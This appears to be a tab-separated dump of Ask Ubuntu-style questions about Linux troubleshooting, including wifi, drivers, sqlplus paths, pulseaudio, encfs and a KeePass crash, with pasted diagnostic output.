420385	fn+f2 does not switch wifi on/off on asus 1015e	wifi works ok but can not be switched on/off with fn+f2 . i have an asus 1015e-ds03 with ubuntu 12.04 lts fresh install ( no dual-boot ) . linux asus-1015e-ds03 3.8.0-35-generic # 52~precise1-ubuntu smp thu jan 30 17:24:40 utc 2014 x86_64 x86_64 x86_64 gnu/linux . problem may be located in asus_nb_wmi driver . please , if you have the same problem , add yourself to the bug report # 1277959. https : //bugs.launchpad.net/ubuntu/+source/linux-lts-raring/+bug/1277959 thank you . christian @ asus-1015e-ds03 : ~ $ lsmod | grep asus asus_nb_wmi 16990 0 asus_wmi 24794 1 asus_nb_wmi sparse_keymap 13890 1 asus_wmi wmi 19256 1 asus_wmi video 19574 2 i915 , asus_wmi christian @ asus-1015e-ds03 : ~ $ rfkill list all 0 : asus-wlan : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no christian @ asus-1015e-ds03 : ~ $ lsmod | grep -e ath9k -e asus ath9k 161996 0 mac80211 619465 1 ath9k ath9k_common 13859 1 ath9k ath9k_hw 457667 2 ath9k , ath9k_common ath 24123 3 ath9k , ath9k_common , ath9k_hw asus_nb_wmi 16990 0 asus_wmi 24794 1 asus_nb_wmi sparse_keymap 13890 1 asus_wmi cfg80211 499466 3 ath9k , mac80211 , ath wmi 19256 1 asus_wmi video 19574 2 i915 , asus_wmi
420387	nmr fid data opener for ubuntu	does anyone know a good application for an nmr 's .fid data . i 'm trying to import my nmr spectra into matlab but i have to convert it to something matlab can actually read .
420391	weird graphics issue only on desktop and other ubuntu apps	i was having an issue after a game caused a gpu hang that forced me to have to do a hard reset and i was having a scrambled display issue , but i fixed that by switching to sna acceleration . but now every few seconds a message comes up saying `` system program problem '' here is what the window says . sorry , ubuntu 12.04 has experienced an internal error executablepath /usr/share/apport/apport-gpu-error-intel.py package xserver-xorg-video-intel2:2.21.15~precise~ppa1.1 [ origin : lp-ppa-glasen-intel-driver ] problemtype crash title gpu lockup ipehr:0x79000002 ipehr:0x0b140001 apportversion 2.0.2-0ubuntu17.6 architecture amd64
420392	setting a default user for startunity	i have installed ubuntu via crouton on my chromebook . so far , everything works fine . the problem is , it starts with the normal user that was set up . i have enabled the root account , and set a password ( as usual ) . now i want to login ( graphically ) as root . the way i start gnome now is : sudo startunity . how can i start it as root ? when i click on logout , it just shuts the gnome session down . it seems that part of the answer is doing something like : sudo enter-chroot su root -- > enter password startunity now the only question remaining is how to set the default user , so i do n't have to enter the password every time ... .
420395	sqlplus : error while loading shared libraries : libsqlplus.so : can not open shared object file : no such file or directory	echo $ path gives me below result : /home/mayank/bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/lib/jvm/java-7-oracle/bin : /usr/lib/jvm/java-7-oracle/db/bin : /usr/lib/jvm/java-7-oracle/jre/bin : /usr/lib/oracle/12.1/client/bin echo $ oracle_home fetches : /usr/lib/oracle/12.1/client echo ld_library_path gives ( set through /etc/bash.bashrc earlier , but now its showing as below ) ld_library_path doing vim for .bash_profile shows below things set : [ [ -s `` $ home/.rvm/scripts/rvm '' ] ] & & source `` $ home/.rvm/scripts/rvm '' # load rvm into a shell session *as a function* ld_library_path= $ ld_library_path : /usr/local/lib export ld_library_path path= $ path : /usr/local/bin export path despite setting the ld_library_path in above file i 'm still not getting the correct path in env despite running sudo ldconfig and then rebooting my machine ! ! what help i 'm looking for : set env vars correctly run sqlplus same question exists superuser , but no solution is given there .
420396	ntop : interfaces is not defined , please run 'dpkg-reconfigure ntop ' and ntop is broken or not fully installed	i am go into a dead loop of install and configure ntop . it tells me ntop : interfaces is not defined , please run 'dpkg-reconfigure ntop ' on startup , but this command leads to ntop is broken or not fully installed . is there any way to manually reconfigure ntop ?
420397	installing codeigniter on ubuntu 13.10	i have a running apache mysql php xampp server on ubuntu 13.10 my path /opt/lampp/htdocs/xampp/www the correct path or directory inside /opt to unzip ci files
420400	wifi problem on sony vaio vgn cr363	sometime my wifi connection get disconected automatically . and also if there is available network with good range it tries to connect with other ? ? are these software issues or i m getting hardware problems ? ? i am using ubuntu 13.04 on my machine .
420405	uninstall sqlplus in 12.04	my sqlplus failed to run and i could n't find a solution to run it ... now i want to uninstall it but to my surprise there is no tutorials for it . i 'll appreciate if someone can please tell me how to uninstall sqlplus like it never existed ( so that i may try everything from scratch ) ...
420409	xubuntu 13.10 position of remote cursor ( teamviewer , x11vnc ) does not change	i am using xubuntu 13.10 and want to remotely access this machine . everything works fine except that the mouse courser position does n't change on the remote system if i move it on the server machine ( xubuntu 13.10 ) . its shape is updating if i accidentally hover the mouse pointer over a textfield or anything else but the position is fixed . i have tested teamviewer ( yes i 've checked `` show remote cursor '' on the client ) and x11vnc ( tested various cursor options ) . both behave similar : the cursor shape updates but the position is fixed . i have tested xfce , lxde with openbox and kde . its the same on all desktops environments
420410	how to permanently edit the core_pattern file ?	i am trying to locate my coredump file in ubuntu 12.04 lts but i cant . the problem is that i have to edit the core_pattern file content after every reboot to get it , because apport does n't work ( do n't know why ) . is there any way to permanently set core_pattern file 's content ? ?
420411	pulseaudio : combining sinks results in having an lfe channel that uses the centre speaker	my goal is applying a low pass ladspa filter on my subwoofer only , which is part of my 5.1 sound system , in pulseaudio . i used the following commands : loading the plugin : pacmd load-module module-ladspa-sink sink_name=ladspa_low_pass master=alsa_output.pci-0000_05_02.0.analog-surround-51 plugin=lowpass_iir_1891 label=lowpass_iir control=86,1 creating a sink with the filtered lfe channel : pacmd load-module module-remap-sink sink_name=remaplfe master=ladspa_low_pass master_channel_map=lfe channel_map=lfe channels=1 creating a sink with the rest of the channels i do n't want to apply the filter to : pacmd load-module module-remap-sink sink_name=remap50 master=alsa_output.pci-0000_05_02.0.analog-surround-51 channels=5 master_channel_map=front-left , center , front-right , rear-left , rear-right channel_map=front-left , center , front-right , rear-left , rear-right combining the two sinks : pacmd load-module module-combine-sink sink_name=combine sink_properties=device.description=mycombine slaves=remap50 , remaplfe channel_map=front-left , center , front-right , rear-left , rear-right , lfe channels=6 after all these steps , i can see and test the channels included with each sink individually in phonon . they are all correct except in case of the sink 'mycombine ' , where when i test the subwoofer , sound comes from my centre speaker instead . so , my question is , how do i fix this ? edit : now as i test it again , it turns out that sound comes out from all channels .
420413	encfs not decrypting all files	had an encrypted drive that i kept on dropbox . did a clean install when i downloaded encrypted files , everything was there . when i gave encfs the key , most of the files were decrypted . but not all . those encrypted after jan 3 2014 or so were not decrypted . i have more encrypted files on my ~/dropbox/.encrypted folder than my ~/encrypted drive . so i know they are there . but for whatever reason , something changed , and i can not decrypt these additional files . i did not alter the key at any time . so not entirely sure what the reason is . thanx !
420414	gnome 13.10 image file	i downloaded gnome 13.10 from this link . is this link trusted ?
420416	dell inspiron 15 ( 3521 ) trackpad refuses to work	i am having another weird issue that happened after this issue v weird graphics issue only on desktop and other ubuntu apps my laptop trackpad is refusing to work at all . i am only able to use my mouse with a usb connected mouse . any help is greatly appreciated . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 004 : id 046d : c52b logitech , inc. unifying receiver bus 003 device 005 : id 148f:3070 ralink technology , corp. rt2870/rt3070 wireless adapter bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 0cf3 : e004 atheros communications , inc . bus 001 device 004 : id 0bda:0129 realtek semiconductor corp . bus 001 device 005 : id 0c45:649a microdia
420418	`` ubuntu '' shows up in boot menu , but my laptop keep telling me that `` no os detected ''	i tried to intall ubuntu 13.10 on my acer aspire 4750 yesterday , and i think i make a mistake choosing that `` lvm '' option . now i am facing these : '' ubuntu '' option now shows up in my boot menu . what is that ? why is it there ? i have install ubuntu before on another notebook , but i never saw that before . how can i remove it or at least make my notebook boot ubuntu automatically ? i can`t boot ubuntu without selecting that first on boot menu . and i have to access boot menu by pressing f12 when booting . i have tried to reinstall it , but it still there . this is my : boot-repair pastebin : http : //paste.ubuntu.com/6931555/
420420	e : some index files failed to download	i try to adhere to the tips to try and fix my always crashing software center , but every time i get the error message : e : some index files failed to download . they have been removed , or old ones used instead . any help ?
420421	what gid number assigning policy does have ubuntu so i can asign my organization gid without conflict ?	in order to assign fixed gid for departments in my organization , i would like to be sure not to choose an gid that would be selected in the future for another reason ( like a new system group for a new technology ) . i can see that gid from 101 to 124 are assigned to system groups like syslog or ssh in my fresh 12.04 installed box . if i want to assign an gid for the legal department or the accounting department , what should i know before deciding ? i was thinking about using number greater than 500 , but maybe there is a write policy about this subject .
420425	sd card reader not working in multi card reader	i 've got a multicard reader in my machine . it lists itself as bus 001 device 003 : id 0bda:0151 realtek semiconductor corp. mass storage device ( multicard reader ) it mounts cf cards just fine , and initially mounted sd cards as well . more recently , it stopped mounting sd cards . i assumed this to be a hardware failure and used a dedicated usb sd card reader . i 've just got a new usb multi-card reader for something else and tried it against my machine out of curiosity . it describes itself as bus 003 device 004 : id 048d:1336 integrated technology express , inc. sd/mmc cardreader it does exactly the same thing , cf cards work fine , sd cards do n't register at all . this makes me suspect that the problem with the first device is actually software and not hardware . the machine is currently on 13.10 , the problem was the same on 13.04 . any suggestions
420426	using ubuntu on laptop	i am currently using ubuntu 13.10 and i feel it uses a lot of resources ... which means that when using a laptop on battery..it last less.it also heats up a lot . this is not done when running on windows.is it true that it uses a lot of resources and if possible how can i reduce it ? thanks
420427	ubuntu 12.04/13.10 resolution difference	first of all , since it 's my 1st post for 2014 , happy new year ! i recently updated from 12.04 lts to 13.10 and i would like to ask something . in 12.04 my screen resolution was 1400x900 and now it is only 1366x768 . is there anything i can do to get my 1400 resolution back ? thanks in advance !
420433	wireless connection problems only on gnomebuntu	i 'm currently using gnomebuntu 13.10 and can not seem to connect to my high schools network . it is a wpa-eap network usig peap and md5 . i 've tried everything i could thing of . i did not have this problem on the unity based ubuntu . wpa_supplicant disableing and renabling the driver using modprobe usb wifi ( stupid idea had no idea why i thought this would work ) please help me diagnose and fix this problem . kernel : 3.13 ubuntu variant : gnome ubuntu version : 13.10 wifi module : qualcomm atheros ar9462 wireless network adapter
420434	jdb not starting up	i am having a wierd problem . i manually installed the newest jdk from oracle just about an hour ago . now when i try running jdb through the command jdb documentlisting1.java the output reads : the program 'jdb ' can be found in the following packages : * openjdk-7-jdk * openjdk-6-jdk try : sudo apt-get install < selected package > can someone please tell me what is going on here ? why is jdb not starting ?
420437	move the ubuntu lock screen dialog	i simply want to move the password dialog away from the center of the screen . preferably to the left , where the log-in dialog is .
420439	change my virtual servers ' admin password	i 'm having a problem with my virtual servers ( clonezilla and accounts ) ; i do n't remember the admin password to access them . i control them in a virtual machine manager . i can login in to the main host server . can anyone help me to change the admin password for these virtual servers ?
420440	find unique names containing consecutive repeating consonants	i 'm just starting to learn how to use ubuntu and i am having some difficulties . i am supposed to use back-referencing to find unique girl names containing consecutive repeating consonants in a file of baby names that i have stored as allnames.txt . i used : $ cat allnames.txt | cut -f5 | sort | uniq | grep -i 'bb\|cc\|dd\|ff\|gg\|hh\|jj\|kk\|ll\|mm\|nn\|pp\|qq\|rr\|ss\|tt\|vv\|ww\|xx\|yy\|zz' and it looks like it worked , but is there an easier ( shorter ) , and possibly more accurate way to do this ?
420442	very slow start up	i am using the following release : lsb version : core-2.0-amd64 : core-2.0-noarch : core-3.0-amd64 : core-3.0-noarch : core-3.1-amd64 : core-3.1-noarch : core-3.2-amd64 : core-3.2-noarch : core-4.0-amd64 : core-4.0-noarch distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise i am having problems with my start up , it is very slow about 1 minute . when i look dmesg there is a jump from 1.8 seconds to 38.5 seconds . the message is : [ 1.779992 ] sdc : sdc1 [ 1.780309 ] sd 4:0:0:0 : [ sdc ] attached scsi disk [ 38.547971 ] adding 8386556k swap on /dev/sdb5 . priority : -1 extents:1 across:8386556k [ 38.554197 ] addrconf ( netdev_up ) : eth0 : link is not ready if i am understanding dmesg information , there is a problem with swap on /dev/sdb5 is it true ? what can i do to correct this situation ? curiously my system never use swap partition because i have a lot of memory , look this information ! : hugo @ hugo-p35-ds3l : ~ $ free total used free shared buffers cached mem : 8177232 1370480 6806752 0 2576 277356 -/+ buffers/cache : 1090548 7086684 swap : 8386556 0 8386556 can you help me ?
420444	lubuntu 12.04 , need updates while roaming	i installed lubuntu 12.04 while i am roaming on old dell inspiron pentium 4 with 1gb ram and integrated ati graphics because i read that this distro handles 720p and more videos . well , it looks like i was wrong because mplayer keeps crashing . i started to think that if i update it may fix the problem . okay , so i have data roaming but not tethering/hotspot , nor the money for it . is there a way to download my updates to my phone ( 185mb approx . ) then transfer to my laptop ?
420445	is it possible for openstack kvm machines cause host system hang up ?	i 've stuck at this issue for a long time . here is a story : i 've got a server with 40 logic cores and 128 gb ram . my buddy helped configured openstack and nova-compute libvirt-type is kvm . it was all fine when we installing . after installation , i am transfered my data and applications from my workstation to the server . i 've opened 17 vms , up to 78 gb ram and 32 corers in total . after i running some applications in vms , the server just hang up randomly . i 've check anythings i could found in logs but there is neither hardware issue nor software fault , the hang ups leaves almost nothing to investigate . i am wondering is it possible for kvm to hang up host because this only happens when i power up all of the vms when server passed an 4 hours stress test fyi : i could only use kvm because qemu is too slow , xen hang up after got cores , lxc just do n't work in default file system configuration and i can not find any way to transfer .
420446	auto umount cifs when user logout	i have ubuntu 10.04 server with something like 20 users i add some commands so that each user that logs in will mount some samba share , but i have notice that when he logs out the mounted folder still exist , so my question is how to automatically umount his mounted folder when he logs out ? all my user can login to the server using ssh or xrdp sessions . thanks .
420454	want to use nvidia drivers . ( without errors )	for a brief period of time i have had ubuntu reinstalled , the 12.10 lts version due to want to have encrypted harddrives ( and that was the installaiton i could make the drives perform what i wanted ) then i upgraded from there , and want to use my nvidia card , i run ubuntu 13.10 ( for now ) on an acer aspire timeline x 4830tg with an nvidia geforce 540m graphics card . my lspci -v gets me : vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : acer incorporated [ ali ] device 054f flags : bus master , fast devsel , latency 0 , irq 48 memory at d1400000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 4000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 ... vga compatible controller : nvidia corporation gf108m [ geforce gt 540m ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : acer incorporated [ ali ] device 0550 flags : bus master , fast devsel , latency 0 , irq 16 memory at d0000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at a0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at b0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at 3000 [ size=128 ] expansion rom at d1000000 [ disabled ] [ size=512k ] capabilities : < access denied > kernel driver in use : nouveau i believe im running out of tricks , ive found several pages ( about 20 ) and tried the most of them . im back att running the default screen resolution in lightgdm , as i were before lowres and logging in to blank screeen . the settings manager says to me that im running intel-sandybridge mobile . i seem to have nouveau driver installed , and nvidia , but cat /var/log/xorg.0.log |less > [ 30.605 ] ( == ) matched intel as autoconfigured driver 0 > [ 30.605 ] ( == ) matched nvidia as autoconfigured driver 1 > [ 30.605 ] ( == ) matched nouveau as autoconfigured driver 2 > [ 30.605 ] ( == ) matched intel as autoconfigured driver 3 > [ 30.605 ] ( == ) matched vesa as autoconfigured driver 4 > [ 30.605 ] ( == ) matched modesetting as autoconfigured driver 5 > [ 30.605 ] ( == ) matched fbdev as autoconfigured driver 6 > [ 30.605 ] ( == ) assigned the driver to the xf86configlayout > [ 30.605 ] ( ii ) loadmodule : `` intel '' > [ 30.605 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so > [ 30.613 ] ( ii ) module intel : vendor= '' x.org foundation '' > [ 30.613 ] compiled for 1.14.5 , module version = 2.99.910 > [ 30.613 ] module class : x.org video driver > [ 30.613 ] abi class : x.org video driver , version 14.1 > [ 30.613 ] ( ii ) loadmodule : `` nvidia '' > [ 30.613 ] ( ww ) warning , could n't open module nvidia > [ 30.613 ] ( ii ) unloadmodule : `` nvidia '' > [ 30.613 ] ( ii ) unloading nvidia > [ 30.613 ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 ) > [ 30.613 ] ( ii ) loadmodule : `` nouveau '' > [ 30.613 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so > [ 30.615 ] ( ii ) module nouveau : vendor= '' x.org foundation '' > [ 30.615 ] compiled for 1.14.2 , module version = 1.0.9 > [ 30.615 ] module class : x.org video driver > [ 30.615 ] abi class : x.org video driver , version 14.1 seems i can not load the module nvidia . believe me ive tried the most things i found , i messed about in grub , i installed purged reinstalled , nvidia , nouveau , bumblebee , blacklisted nouveau ( unblacklisted it ) all the tips you can find here about nvidia , several times , and i never did install the proprietary drivers , from nvidias homepage . the software-proprieties-gtk command gave me no alternative drivers . the reason i went from ubuntu or linux in the first place was because of nvidia drivers not working , ( that was approx : 1 year ago ) i dont want to mess about more and i am afraid that if i do i wont have patience to continue to get it to work . i already wasted to much time on this matter
420455	mounting and accessing western digital 's mycloud nas	i have bought a western digital mycloud disk . i did succeed to mount it under lubuntu 13.10 by means of the following command : sudo mount -o soft , intr , rsize=8192 , wsize=8192 : /nfs /home/myusername/nfs/ afterwards i do see the various shares in the directory nfs . unfortunately however i do not get access to the files . this is because the western digital device needs a username and password . i am a linux rookie so would there be someone willing to tell me how to specify these in the mount command ? thanks in advance !
420463	how to enable my webcam in my sony vaio	i am unable to use my web cam . given below are the laptop 's model details for your reference . laptop specifics : sony vaio e series vpceh25en
420469	where is the folder for kmenuedit located in kubuntu ?	i am using kubuntu 13.10 . i often type `` kmenuedit '' into search in the start menu to launch the kmenuedit program , but i 'm confused as to where the kmenuedit folder is . can anyone please tell me where it is ?
420470	folders disappering from external hard drive in 13.10	i recently upgraded my asus netbook from 10.04 to 10.10 . now whenever i plugin my external hard drive few folders start to disapper from the external hdd . again i plucked it back and few more folders disappeared . now when i log it in a windows pc , all folders are there as it is . my external hdd is from toshiba . please help .
420474	why does my month old ubuntu server 10.04 machine suddenly boot to debian ?	i have a machine running ubuntu server 10.04 . i boot it when i need to run a task , then shut it down when the task is finished . i 've been doing this for a month . i left it on all night last night this morning , ssh attempts failed with error message `` connection rejected '' the web client of the software running on the server was unavailable . page not found . no video output from the server i did a hard shutdown and booted it back up the machine booted to a debian gui login screen . both my user accounts were listed . i am able to login and all my files are still there . i 've never installed debian on this machine . i realize ubuntu is a derivative of debian , but it seems strange that , after a month of booting to the ubuntu server command line , it all of a sudden boots to a debian gui login screen . i checked my command history and there is nothing strange there . i 'm the only one with these credentials . they are not reused . they are unique to this machine . i 'm not a linux guy . my understanding of linux is minimal . how is the machine suddenly booting into debian ? i 've never explicitly installed debian on this machine . i do n't even have debian installation media .
420476	separate system users and service users	we all know that we have system users and service users . i am looking for a way to separate them as system users and service user list . is there any way ?
420481	shotwell crashes in ubuntu 13.10	shotwell is crashing any time i alt-tab out of it and refusing to restart . it will open fine on initial boot , but as soon as i alt-tab away it closes and wo n't repoen . i 've already imported my images and that went fine . it appears to run fine as long as it keeps focus . anyone know what 's going on ? is this just a bug and i have to wait for the update or is there something i can do to fix it ?
420484	intermittent wireless problems	i am facing some intermittent connection issues over my wireless connection . thing work fine for quite a long time and suddenly there is no connectivity at all . i cant even ping my router . after disconnecting and reconnecting from the network manager everything works fine again . recently changed my wireless router and suspect that might be the cause but cant be sure as other devices dont seem to have similar problems . i am running ubuntu 12.04 lts on a dell latitude 6410 . my network card is broadcom corporation bcm4313 on brcmsmac driver and running kde 4.12 can somebody point out where should i look for diagnosing this issue . thanks
420485	install smartmontools 6.2 on ubuntu 12.04 ?	ubuntu 12.04 provides via apt-get smartmontools ( smartctl ) 5.41 ( released 2011-06-09 ) . the latest version of smartmontools is 6.2 and the package for this is available with 14.04 . is there any reason why i should not install the 6.2 package under 12.04 ?
420487	resolvconf is not updating resolv.conf file when connecting via dhcp	i 'm running 13.10 , and when i connect to a wired network which is configured in network manager for dhcp , i get an address , but resolvconf is not updating /etc/resolv.conf properly . i get an ip address , and traffic is routed properly , but the dns servers are not being set . the file is getting touched , but the information provided by the dhcp server ( which i can see coming through in syslog ) is not being added to resolv.conf . any suggestions ?
420489	can an exisiting swap partition be merged into a new partition as a logical volume ?	i am using a dual boot setup ( windows 7 and ubuntu 12.04 lts ) . the first two partitions belong to windows and the third and fourth are the ubuntu system and swap partions respectively . all of these are primary and there is remaining unallocated space . my plan was to allocate the remaining space as a shared partition for both operating systems , but since i defined all of the current partitions as primary , this is not possible ( max . 4 primary ) . is is possible to create a new primary partition from the ubuntu swap partition and the unallocated space , and place the new swap partition inside - or will this break my system ? i know that logical swap partitions are possible , but not if such a change is possible retrospectively .
420493	restarting network over ssh causes hang	i 'm running this : ssh root @ 192.168.88.88 '/etc/init.d/networking restart' it works and outputs the results , but never returns . yet other commands do . maybe because the network goes down ( as intended ) . how can i terminate it ? i tried adding an exit command , but no dice . update : i noticed this does work sometimes . the problem seems to happen if the process is interrupted and the remote interface configuration is in an unknown state . i still ca n't track down exactly what causes the hanging .
420494	x-fi platinum front panel and center speaker problem	is there any way to make the front panel work on ubuntu 13.10 or 12.04 ? ( the remote control and the midi input ) is there any way to enable center speaker ( 7.1 speakers ) without qasmixer app ( only with ubuntu 's settins ) ?
420495	ffmpeg batch convert files	i have a folder that contains audio files , files are in sequence named from 1 to 150 but none of the files have file extension . what i want is to convert them to aac or.mp3 and if i can join them as a one audio file that i will be fantastic . can some one help me out with this ? ? thank you in advanced
420499	datacard is not detecting in ubuntu 12.04	whenever i 'm trying to connect any type of datacard like photon plus/airtel 3g its not detecting . i 'm using ubuntu 12.04 version.i 've tried a lot i.e , wired connections- > mobile broadband- > add- > new mobile broadband connection- > select country- > select type ( airtel/docomo ) - > continue- > apply . but i 'm not able to connecting , even its not detecting at my laptop ... pls help me .
420501	problem with logging as `` system default ''	i 've recently changed unity for gnome 3.10 . there was a problem with deactivating extensions after reboot . i know that there is advice to log as `` system default '' to solve this problem , but after doing that i do n't see anything only clear desktop . there is not any bar on top or sth else . : (
420503	using texlive installed in windows for ubuntu	i have both win7 and ubuntu 12.04 . i use texlive 2012 with texmaker in win7 . is it possible to use it ( texlive ) in ubuntu so i wo n't have to download 2gb again ! i hope it was clear . ( i 'm newbie in linux . )
420504	restore failed : failed with an unknown error	i am trying to restore my data to a new hard drive from my old hard drive . i created a backup on the old hard drive . when i restore it gives me the error `` restore failed : failed with an unknown error '' . what should i do to fix this ? here is a screen shot :
420506	compiling cblas undefined reference to `pthread_create ' pthread_join '	i am compiling cblas using 'make all ' command but it 's giving me following error . gfortran -o xscblat1 c_sblat1.o c_sblas1.o ../lib/cblas_linux.a /usr/lib/libblas.a /usr/lib/libblas.a ( blas_server.o ) : in function `blas_thread_init ' : ( .text+0x5cb ) : undefined reference to `pthread_create' /usr/lib/libblas.a ( blas_server.o ) : in function `goto_set_num_threads ' : ( .text+0xa95 ) : undefined reference to `pthread_create' /usr/lib/libblas.a ( blas_server.o ) : in function `blas_thread_shutdown_ ' : ( .text+0xd18 ) : undefined reference to `pthread_join' collect2 : ld returned 1 exit status make [ 1 ] : *** [ xscblat1 ] error 1 make [ 1 ] : leaving directory `/home/priyank/music/cblas/testing' make : *** [ alltst ] error 2 would really appreciate if anyone can help me out with this .
420513	what are the standard places that java virtual machine is configured on ubuntu 12.04 ?	i 'm running pangolin ( 12.04 lts ) and want to sort out some java stuff where my jvm is pointing at a different place to my compiler . to demonstrate , my jvm is as follows : pcrow @ pcrow-hp-notebook : ~/documents $ java -version java version `` 1.6.0_27 '' openjdk runtime environment ( icedtea6 1.12.6 ) ( 6b27-1.12.6-1ubuntu0.12.04.4 ) openjdk 64-bit server vm ( build 20.0-b12 , mixed mode ) whereas my compiler points here : pcrow @ pcrow-hp-notebook : ~/documents $ javac -version javac 1.7.0_51 i have configured the latter through adding an entry to my ~/.profile file . the thing is that i 'm not sure what sets the former and i want them to be consistent . in '/etc/environment ' i have the following entry : path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games '' and when i run printenv | grep `` java '' path=/usr/share/maven/bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/lib/jvm/java-7-openjdk-amd64/bin java_home=/usr/lib/jvm/java-7-openjdk-amd64 can you tell me where icedtea6 is most likely set up on ubuntu ? i 'd like to override it if i can and make sure my jvm and compiler are both using the same version .
420517	upstart and incompatible sysvinit scripts	when i reboot or try to shutdown i get the following message : error : calling a sysvinit script on a system using upstart is n't supported . please use the 'service ' command instead . how do i find which script is causing this error ?
420518	problemas particiones ntfs	buenas mi problema es que tengo una laptop con windows 8 pre instalado y le instale ubuntu en un dual boot todo funciona de maravilla excepto que la particiรณn que deje para datos cuando intento guardarle algo en ubuntu funciona bien pero en el momento en que la reinicio y entro de nuevo a windows 8 los datos que guarda o almacene en ubuntu desaparecen de la particiรณn de datos ... alguien sabrรก por que sucede esto o tendrรก la soluciรณn ? ? ?
420520	best z87 motherboard compatibility with linux	hi everyone so first i 'd like to apology for my poor english . i 'm going to build a new computer so i took those parts : - intel i4930k - evga geforce gtx 780 3gb or the ti one or evga geforce gtx 690 4gb . i need help for this , the gtx 690 is much more expensive but i do n't know if it 's worth it . - g.skill ripjaws x series 16gb ( 2 x 8gb ) ddr3-1866 memory so i need help to choose the motherboard . i looked up for the z87 motherboards . i heard that at this point there were aproximately all the same . so i 'm going to do a dualboot ubuntu/windows , ubuntu for every days life and windows for 3d animations and video-games . i heard that some z87 had problems with ubuntu or with grubs , some are saying that it 's working well . so i 'd like opinions about a personal experience of someone with a z87 and linux . thank you a lot for reading me .
420522	cellular network not working on galaxy nexus ubuntu touch dual boot	i have installed ubuntu touch as dual boot on my galaxy nexus . but i can not send/receive calls because my cellular network is not working . carrier shows as n/a . however wi-fi is working without any issue . please help
420526	terminals on second monitor	i have a hp g62 laptop and a nec accusync lcd73v monitor , which i connect via vga . i use the terminal a lot , so at startup ubuntu auto-launches 4 xterms . is there any way to start them at a specified location ? ( see images for more clarification ) at startup : how i want it :
420527	how to dump all the manully altered gsettings keys ?	the dconf editor indicate the keys whose values have been altered by the user by changing the key 's font to bold as shown in the snapshot . so i wonder if there is a way to dump all the keys ( including their schema ) which have been modified manually by user or changed to something other than the default ? ..that would prove very helpful to solve many desktop environment issues , or at least for me : )
420529	keepass 2 installs but fails to run	i installed keepass 2 via synaptic and it appears to have installed , but when i run it , it fires up briefly , then disappears . i have uninstalled and re-installed . i 'ducked ' the issue ( via duckduckgo ) and tried a couple of suggestions that involved adding ppas and re-installing , but all to no avail . it still fires up briefly and then disappears . i 'm running ubuntu 13:10 32 bit on a dell dimension 3100 with 2gb of ram and a 2tb hdd . i tried running it from the terminal and got the following error message : sendmessage ( 67108902 , 0x101f , ( nil ) , ( nil ) ) sendmessage ( 0 , 0x1203 , ( nil ) , 0xbfb96aa0 ) sendmessage ( 0 , 0x1204 , ( nil ) , 0xbfb96aa0 ) sendmessage ( 0 , 0x1203 , 0x1 , 0xbfb96aa0 ) sendmessage ( 0 , 0x1204 , 0x1 , 0xbfb96aa0 ) sendmessage ( 0 , 0x1203 , 0x2 , 0xbfb96aa0 ) sendmessage ( 0 , 0x1204 , 0x2 , 0xbfb96aa0 ) sendmessage ( 0 , 0x1203 , 0x3 , 0xbfb96aa0 ) sendmessage ( 0 , 0x1204 , 0x3 , 0xbfb96aa0 ) sendmessage ( 0 , 0x1203 , 0x4 , 0xbfb96aa0 ) sendmessage ( 0 , 0x1204 , 0x4 , 0xbfb96aa0 ) sendmessage ( 67108902 , 0x101f , ( nil ) , ( nil ) ) sendmessage ( 0 , 0x1203 , ( nil ) , 0xbfb97580 ) sendmessage ( 0 , 0x1204 , ( nil ) , 0xbfb97580 ) sendmessage ( 0 , 0x1203 , 0x1 , 0xbfb97580 ) sendmessage ( 0 , 0x1204 , 0x1 , 0xbfb97580 ) sendmessage ( 0 , 0x1203 , 0x2 , 0xbfb97580 ) sendmessage ( 0 , 0x1204 , 0x2 , 0xbfb97580 ) sendmessage ( 0 , 0x1203 , 0x3 , 0xbfb97580 ) sendmessage ( 0 , 0x1204 , 0x3 , 0xbfb97580 ) sendmessage ( 0 , 0x1203 , 0x4 , 0xbfb97580 ) sendmessage ( 0 , 0x1204 , 0x4 , 0xbfb97580 ) [ xcb ] too much data requested from _xread [ xcb ] this is most likely caused by a broken x extension library [ xcb ] aborting , sorry about that . cli : ../../src/xcb_io.c:736 : _xread : assertion ` ! xcb_xlib_too_much_data_requested ' failed . stacktrace : at ( wrapper managed-to-native ) system.windows.forms.x11keyboard.xcreatefontset ( intptr , string , intptr & , int & , intptr ) < 0xffffffff > at system.windows.forms.x11keyboard.createoverthespotxic ( intptr , intptr ) < 0x000af > at system.windows.forms.x11keyboard.createxic ( intptr , intptr ) < 0x000c7 > at system.windows.forms.x11keyboard.createxicforwindow ( intptr ) < 0x00027 > at system.windows.forms.x11keyboard.focusin ( intptr ) < 0x0008f > at system.windows.forms.xplatuix11.setfocus ( intptr ) < 0x000a3 > at system.windows.forms.xplatui.setfocus ( intptr ) < 0x0001a > at system.windows.forms.containercontrol.sendcontrolfocus ( system.windows.forms.control ) < 0x00083 > at system.windows.forms.form.setvisiblecore ( bool 